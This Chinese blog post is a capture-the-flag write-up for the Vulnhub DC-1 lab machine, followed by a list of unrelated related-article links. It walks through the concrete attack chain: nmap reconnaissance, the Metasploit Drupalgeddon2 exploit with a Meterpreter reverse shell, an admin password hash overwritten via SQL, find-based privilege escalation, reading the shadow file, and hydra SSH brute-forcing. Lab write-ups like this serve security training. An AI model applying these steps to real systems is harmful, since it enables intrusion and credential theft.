前言

我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/

目标机IP地址:198.162.9.138

攻击机kali IP地址:198.132.9.129

想要了解SQL注入原理的可以看我的这两篇文章:

https://www.cnblogs.com/lxfweb/p/13236372.html

https://www.cnblogs.com/lxfweb/p/13275582.html

想要了解XSS原理的可以看我的这两篇文章:

https://www.cnblogs.com/lxfweb/p/12709061.html

https://www.cnblogs.com/lxfweb/p/13286271.html

目标探测

渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对目标机进行主机发现。因为都在局域网,所以使用内网扫描。

命令:arp-scan -l



发现主机IP后,使用nmap进行端口扫描。

命令:nmap -v -A 192.168.9.138



发现目标机开放了22、80、111端口。

寻找flag1

现在我们以80端口作为突破口。通过指纹识别,这里用到的是whatweb,发现是Drupal cms 版本是7。下面使用MSF进行渗透攻击。打开工具,搜索Drupal的相关模块。



这里我选择第4个模块。读者可以尝试其他模块。

输入命令:use exploit/unix/webapp/drupal_drupalgeddon2 加载exploit。然后查看相关payload,输入命令:show payloads



这里选择15,输入:set payload php/meterpreter/reverse_tcp

接着输入:show options 打开配置选项。



标为yes的都是必须配置的。现在配置一下RHOSTS(目标机IP),LHOSTS(攻击机IP),其他默认就行了。

发现获取到了meterpreter shell。现在查看一下目录。



发现目标,找到flag1。

寻找flag2

查看flag1文件,发现有提示,咱们寻找配置文件。

接下来进入sites目录下,接着进入default目录。查看settings.php文件。



找到了flag2。

寻找flag3

我们发现配置文件中有数据库账号和密码。现在尝试登陆数据库。

现在进入目标机shell环境,查看端口情况。命令:netstat -ano



我们注意到,数据库只允许本地连接。所以,我们需要反弹一个shell出来。

采用python调用系统命令:

python -c 'import pty;pty.spawn("/bin/bash")'

发现反弹成功,接下来输入数据库账号密码连接MySQL数据库。



下面,我们查看库,查看表。



找关键的表,发现里面存在users表。打开它。



发现了admin账户和密码。但是这个密码有点复杂,破解有点困难。所以想想其他的方法。这里我们登陆了对方数据库,所以,我们采用对方的加密方式覆盖掉原来的密码就可以了。

先调用命令生成咱们设置的密文。明文是xfaicl。命令:php scripts/password-hash.sh xfaicl



接着替换掉原来的密码。

update users set pass="$S$DxQCTfic1drhqY7jbCf62drw/T204r3is./KmIUKEzlQUpfHx1RQ" where uid=1

<s="$S$DxQCTfic1drhqY7jbCf62drw/T204r3is./KmIUKEzlQUpfHx1RQ" where uid=1;



替换成功后,咱们登陆网站。依次点击,发现flag3。

寻找flag4

点击flag3后,关注点放到passwd文件和shadow文件。Linux为了考虑安全性,用单独的shadow文件存储Linux用户的密码信息,并且只有root用户有权限读取此文件。所以下一步,我们要考虑的是提权了。

采用find提权。



提权成功后,查看shadow文件。



发现flag4是一个账户。猜测是ssh账户,这里尝试暴力破解。使用hydra破解成功。



破解到密码是orange,接下来登陆ssh。发现flag4,查看它。



里面内容说,还有一个flag4,在root目录下,刚才咱们已经提升权限了。所以直接查看。

小结

目标靶机一共存在5个flag,咱们已经全部找到,上面用到的一些方法希望对大家有帮助。

DC-1靶机实战和分析的更多相关文章

  1. 揪出“凶手”——实战WinDbg分析电脑蓝屏原因

    http://www.appinn.com/blue-screen-search-code/ 蓝屏代码查询器 – 找出蓝屏的元凶 11 文章标签: windows / 系统 / 蓝屏. 蓝屏代码查询器 ...

  2. Salesforce学习之路-developer篇(五)一文读懂Aura原理及实战案例分析

    1. 什么是Lightning Component框架? Lightning Component框架是一个UI框架,用于为移动和台式设备开发Web应用程序.这是一个单页面Web应用框架,用于为Ligh ...

  3. vulnstack靶机实战01

    前言 vulnstack是红日安全的一个实战环境,地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/最近在学习内网渗透方面的相关知识,通过对靶机的 ...

  4. 3. 文件上传靶机实战(附靶机跟writeup)

    upload-labs 一个帮你总结所有类型的上传漏洞的靶场 文件上传靶机下载地址:https://github.com/c0ny1/upload-labs   运行环境 操作系统:推荐windows ...

  5. 毕业两年做到测试经理的经历总结- 各个端的自动化,性能测试结合项目具体场景实战,分析客户反馈的Bug

    前言 最近看到行业的前辈都分享一些过往的经历来指导我们这些测试人员,我很尊敬我们的行业前辈,没有他们在前面铺路,如今我们这帮年轻的测试人估计还在碰壁或摸着石头过河,结合前辈们的经验,作为年轻的测试人也 ...

  6. 【Python3网络爬虫开发实战】 分析Ajax爬取今日头条街拍美图

    前言本文的文字及图片来源于网络,仅供学习.交流使用,不具有任何商业用途,版权归原作者所有,如有问题请及时联系我们以作处理.作者:haoxuan10 本节中,我们以今日头条为例来尝试通过分析Ajax请求 ...

  7. Spring Cloud 整合分布式链路追踪系统Sleuth和ZipKin实战,分析系统瓶颈

    导读 微服务架构中,是否遇到过这种情况,服务间调用链过长,导致性能迟迟上不去,不知道哪里出问题了,巴拉巴拉....,回归正题,今天我们使用SpringCloud组件,来分析一下微服务架构中系统调用的瓶 ...

  8. 上传靶机实战之upload-labs解题

    前言 我们知道对靶机的渗透可以提高自己对知识的掌握能力,这篇文章就对上传靶机upload-labs做一个全面的思路分析,一共21个关卡.让我们开始吧,之前也写过关于上传的专题,分别为浅谈文件上传漏洞( ...

  9. 【mongoDB高级篇③】综合实战(1): 分析国家地震数据

    数据准备 下载国家地震数据 http://data.earthquake.cn/data/ 通过navicat导入到数据库,方便和mysql语句做对比 shard分片集群配置 # step 1 mkd ...

随机推荐

  1. leetcode1028 从先序遍历还原二叉树 python 100%内存 一次遍历

    1028. 从先序遍历还原二叉树 python 100%内存 一次遍历     题目 我们从二叉树的根节点 root 开始进行深度优先搜索. 在遍历中的每个节点处,我们输出 D 条短划线(其中 D 是 ...

  2. SQLSTATE[42000]: Syntax error or access violation: 1253 COLLATION 'utf8mb4_unicode_ci' is not valid for CHARACTER SET 'binary'

    SQLSTATE[42000]: Syntax error or access violation: 1253 COLLATION 'utf8mb4_unicode_ci' is not valid ...

  3. .NET Core请求控制器Action方法正确匹配,但为何404?

    前言 有些时候我们会发现方法名称都正确匹配,但就是找不到对应请求接口,所以本文我们来深入了解下何时会出现接口请求404的情况. 匹配控制器Action方法(404) 首先我们创建一个web api应用 ...

  4. express高效入门教程(4)

    4.静态文件 4.1.普通处理静态文件的方法 在./views/index.html文件中去引入另一个css文件index.css,index.css文件放在public/css目录下,目录结构是这样 ...

  5. Redis系列(八):数据结构List双向链表中阻塞版本之BLPOP、BRPOP和LINDEX、LINSERT、LRANGE命令详解

    1.BRPOP.BLPOP BLPOP: BLPOP 是阻塞式列表的弹出原语. 它是命令 LPOP 的阻塞版本,这是因为当给定列表内没有任何元素可供弹出的时候, 连接将被 BLPOP 命令阻塞. 当给 ...

  6. 基本 Docker 命令列表

    docker build -t friendlyname .# 使用此目录的 Dockerfile 创建镜像 docker run -p 4000:80 friendlyname # 运行端口 400 ...

  7. openstack cinder-backup流程与源码分析

    在现在的云计算大数据环境下,备份容灾已经变成了一个炙手可热的话题,今天,和大家一起分享一下openstack是怎么做灾备的. [首先介绍快照] snapshot可以为volume创建快照,快照中保存了 ...

  8. springMVC中的HttpSession与Model

    目录 1.1 spring的@MODELATTRIBUTE 2.1 session的概念 3.1 示例 4.1 为什么springmvc框架要使用model这个对象呢? 突然发问:相信很多人在做WEB ...

  9. Docker-教你如何通过 Docker 快速搭建各种测试环境

    今天给大家分享的主题是,如何通过 Docker 快速搭建各种测试环境,本文列举的,也是作者在工作中经常用到的,其中包括 MySQL.Redis.Elasticsearch.MongoDB 安装步骤,通 ...

  10. day70 django中间件

    目录 一.django的七个中间件 二.如何自定义中间件 1 自定义中间件的创建方式 2 django提供自定制中间件的五个方法 2.1 必须掌握两个方法 2.2 了解方法 三.csrf跨站请求伪造校 ...